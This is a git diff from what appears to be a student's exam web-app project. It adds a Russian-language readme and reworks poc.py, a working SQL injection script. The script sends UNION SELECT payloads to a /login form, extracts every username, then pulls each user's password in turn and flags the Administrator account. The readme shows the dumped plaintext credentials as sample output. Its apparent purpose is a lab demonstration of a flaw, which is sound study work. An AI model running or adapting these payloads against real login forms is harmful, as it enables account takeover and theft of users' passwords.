minimal readme added

poc ordering FIXEEEED (looks like i'm getting no sleep today))))))
added admin highlight ( im cooked
2025-12-16 03:26:15 +10:00 · 2025-12-16 03:22:05 +10:00 · 2025-12-16 02:49:11 +10:00
3 changed files with 58 additions and 11 deletions
--- a/poc.py
+++ b/poc.py
@@ -9,24 +9,31 @@ args = parser.parse_args()

 BASE_URL = args.base_url

-login_payload = "' UNION SELECT login FROM users--"
+login_payload = "' UNION SELECT login FROM (Select * from users ORDER BY id)--"
 form_data = {"login": login_payload, "password": "' OR 1=1--"}
 response_logins = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
-
-password_payload = "' UNION SELECT password FROM users--"
-form_data = {"login": password_payload, "password": "' OR 1=1--"}
-response_passwords = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
-
 logins_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_logins.text).group(1)
-passwords_raw = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_passwords.text).group(1)
-
 logins= logins_raw.split("',), ('")
-passwords = passwords_raw.split("',), ('")
+
+
+passwords=[]
+for login in logins:
+    password_payload = f"' UNION SELECT password FROM (Select * from users WHERE login='{login}')--"
+    form_data = {"login": password_payload, "password": "' OR 1=1--"}
+    response_password = requests.post(f"{BASE_URL}/login", data=form_data, allow_redirects=True)
+    password = re.search(r"<h1>Привет,\s*([^<]*)</h1>", response_password.text).group(1)
+    passwords.append(password)


 if logins and passwords:
    for i, (login, password) in enumerate(zip(logins, passwords)):
-        print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+        if login == "Administrator":
+            print(f"{'*' * 60}")
+            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}  <-- !!! ВАЖНО !!!")
+            print(f"{'*' * 60}")
+        else:
+            print(f"  {i+1}. Логин: {login:<20} Пароль: {password}")
+            
 else:
    print("Не удалось извлечь данные.")

--- a/poc_recs.txt
+++ b/poc_recs.txt
@@ -1 +0,0 @@
-requests
--- a/readme.md
+++ b/readme.md
@@ -0,0 +1,41 @@
+К сожалениюя я не любитель PHP, так что всё будет на питоне (Fastapi)
+
+# PC-Seq-Exam-WebApp
+
+## Сборка 
+
+```sh
+docker build -t kulesh_web-app:v0.0.1a .
+```
+
+## Запуск 
+```sh
+docker compose up -d
+```
+## Регистрация через curl
+
+
+```bash
+curl -X POST http://localhost/register -d "login=Administrator&password=protected_by_sheer_will" -L
+curl -X POST http://localhost/register -d "login=Kulesh_AB&password=bibaIboba2aboba" -L
+```
+## SQLi
+в бреду намаслал Proof Of Concept
+он мало что проверяет, но как я понял рабоатет, быть может за исклбчением когда 
+пользователь очень любит скобочки кавычки и пробелы)
+
+для запуска ставим requests,
+```pip install requests```
+ в помошь)
+```sh
+python ./poc.py --base-url http://aboba.eu
+```
+допустм что 2 пользователя зарегались с посмошью команд выше
+
+```
+./poc.py
+************************************************************
+  1. Логин: Administrator        Пароль: protected_by_sheer_will  <-- !!! ВАЖНО !!!
+************************************************************
+  2. Логин: Kulesh_AB            Пароль: bibaIboba2aboba
+```
Author	SHA1	Message	Date
OkunElya	f958956395	minimal readme added	2025-12-16 03:26:15 +10:00
OkunElya	85083c9f15	poc ordering FIXEEEED (looks like i'm getting no sleep today))))))	2025-12-16 03:22:05 +10:00
OkunElya	ed137b7620	added admin highlight ( im cooked	2025-12-16 02:49:11 +10:00